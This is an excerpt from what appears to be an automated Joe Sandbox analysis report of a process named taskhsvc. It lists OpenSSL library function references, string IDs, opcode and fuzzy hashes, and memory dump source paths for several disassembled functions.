                                                            • String ID:
                                                            • API String ID: 2788379215-0
                                                            • Opcode ID: df1a2d29b0fe8b7dea977d2664622ddffafbf59aeb1b16b015e5c60f2e9504b1
                                                            • Instruction ID: cc0171aa06af1b7daafd6d84d5947c6db8880095a1063f551280ecbb7824f3e2
                                                            • Opcode Fuzzy Hash: df1a2d29b0fe8b7dea977d2664622ddffafbf59aeb1b16b015e5c60f2e9504b1
                                                            • Instruction Fuzzy Hash: C0F0177050AB009FCB00EF31C584B8BBBF4AF49348F02081CD5959B700D770A504CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ASN1_item_i2d.LIBEAY32 ref: 6CF16DC5
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF16DDA
                                                            • ASN1_item_new.LIBEAY32(?,?,?,?,?,?,?,?,?,?,6CE3F4F3), ref: 6CF16DF5
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_i2dN1_item_new__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 1700296266-0
                                                            • Opcode ID: 2948cb9527a0399251f1baf5d1dd1176ef95141e83d40a3eb1893a92e984e995
                                                            • Instruction ID: e9276ee5a49141be4700974e350cdb4e46b07aebfdcb093596c3f6ee0e4ad043
                                                            • Opcode Fuzzy Hash: 2948cb9527a0399251f1baf5d1dd1176ef95141e83d40a3eb1893a92e984e995
                                                            • Instruction Fuzzy Hash: 40F0B7706196418FCB40EF39C28154BBBF1AB89208F16991CE6A4CBB04D330A545CF87
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error__stack_chk_fail
                                                            • String ID: B
                                                            • API String ID: 738277180-1255198513
                                                            • Opcode ID: 24cf4cb4275da065704f1e426e5d83c7934781694e8a5665889c47c59823abec
                                                            • Instruction ID: d00041421eba3d5a61e4da759a85b088d02d677f26b7627fd8e565ed5a43d024
                                                            • Opcode Fuzzy Hash: 24cf4cb4275da065704f1e426e5d83c7934781694e8a5665889c47c59823abec
                                                            • Instruction Fuzzy Hash: 6911E5726093448FC710DF69D54064BFBF4FBC8328F12891EEAA89B710D3B5A945CB96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: strlen
                                                            • String ID: DER:
                                                            • API String ID: 39653677-232962361
                                                            • Opcode ID: 39c0290901ca7dd1ee4d01598c32bf45127dc3da98f249fab08a7b3333126237
                                                            • Instruction ID: f37ea83c21d87ca75195681e62c32ed5a03b4478e511cfaf3edd8c414605e98b
                                                            • Opcode Fuzzy Hash: 39c0290901ca7dd1ee4d01598c32bf45127dc3da98f249fab08a7b3333126237
                                                            • Instruction Fuzzy Hash: F4F0F970508B049FDB10EFA9C5D0A0BBFE4EB8A749F11891EE694D7701D231D9458B97
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • BIO_new.LIBEAY32 ref: 6CEC8E30
                                                              • Part of subcall function 6CEC4560: CRYPTO_malloc.LIBEAY32 ref: 6CEC458C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mallocO_new
                                                            • String ID: :$r$s
                                                            • API String ID: 1843509399-1836192333
                                                            • Opcode ID: 3103ec384c60c76e040730de134702254e988afb1c57a70e36579e656b083383
                                                            • Instruction ID: 9b111a4916da4597e2deb73d7f8722873f48bc9b4c550e48ed19e3962181dd21
                                                            • Opcode Fuzzy Hash: 3103ec384c60c76e040730de134702254e988afb1c57a70e36579e656b083383
                                                            • Instruction Fuzzy Hash: 51F0F8B1A093119FDB10DF6ADA8055FBBF4EBC9618F52991EE5A48B300D231D8458B93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A$q$w
                                                            • API String ID: 0-3864771027
                                                            • Opcode ID: 2c311d1004ab74d34cd4fa1e79515e14eaff0df499c58c2752e3e7f3d257c6ca
                                                            • Instruction ID: 4500934d251f629454cfb242ab0257b6f57f0317ea735fd1fba37cafa4ef5b15
                                                            • Opcode Fuzzy Hash: 2c311d1004ab74d34cd4fa1e79515e14eaff0df499c58c2752e3e7f3d257c6ca
                                                            • Instruction Fuzzy Hash: 1DF03AB46087418FD704CF14C56571BBBF1BBD6308F62894DD9A84B790C7BAA906CF42
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: C
                                                            • API String ID: 1767461275-1037565863
                                                            • Opcode ID: 9ddabe5dcba67b4e40a4452cd1bfce946ca7ba304b91cdf7058e3a79e79a0392
                                                            • Instruction ID: be5cb3efc06ec1c7c1185edb9ce1288397bd1f51703f27d3619fbbe23d9a8a85
                                                            • Opcode Fuzzy Hash: 9ddabe5dcba67b4e40a4452cd1bfce946ca7ba304b91cdf7058e3a79e79a0392
                                                            • Instruction Fuzzy Hash: 1DF01D756087428FDB04DF24C11136AB7F0BB8530CF51891DD9996B740C775AA05CB86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%